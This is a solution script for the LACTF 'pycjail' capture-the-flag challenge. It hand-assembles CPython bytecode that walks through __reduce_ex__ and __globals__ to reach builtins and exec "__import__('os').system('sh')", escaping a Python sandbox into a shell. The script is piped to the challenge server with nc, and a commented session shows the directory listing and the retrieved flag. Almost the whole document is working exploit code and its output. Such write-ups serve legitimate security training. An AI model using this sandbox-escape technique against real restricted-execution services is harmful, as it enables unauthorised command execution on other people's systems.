Solution for LACTF - pycjail (Misc)

solve.py

from opcode import opmap
import dis

code = b""

code += bytes([opmap["LOAD_CONST"], 0])
code += bytes([opmap["GET_LEN"], 0])
code += bytes([opmap["IMPORT_FROM"], 0])
code += bytes([opmap["ROT_TWO"], 0])
code += bytes([opmap["CALL_FUNCTION"], 1])
code += bytes([opmap["MATCH_MAPPING"], 0])
code += bytes([opmap["BINARY_SUBSCR"], 0])
code += bytes([opmap["IMPORT_FROM"], 1])
code += bytes([opmap["LOAD_CONST"], 0])
code += bytes([opmap["BINARY_SUBSCR"], 0])
code += bytes([opmap["LOAD_CONST"], 1])
code += bytes([opmap["BINARY_SUBSCR"], 0])
code += bytes([opmap["LOAD_CONST"], 2])
code += bytes([opmap["CALL_FUNCTION"], 1])
code += bytes([opmap["RETURN_VALUE"], 0])
# print(len(code))

print("__builtins__,exec,__import__('os').system('sh')")
print("__reduce_ex__,__globals__")
print(code.hex())
print()

# $ (python solve.py; cat) | nc lac.tf 31130
# consts: names: code: ls -al
# total 16
# drwxr-xr-x 1 nobody nogroup 4096 Feb 11 04:22 .
# drwxr-xr-x 1 nobody nogroup 4096 Feb 11 04:22 ..
# -rw-r--r-- 1 nobody nogroup   47 Jan 28 20:17 flag.txt
# -rwxr-xr-x 1 nobody nogroup 1235 Feb  2 22:48 run
# cat flag.txt
# flag{maybe_i_should_only_allow_nops_next_time}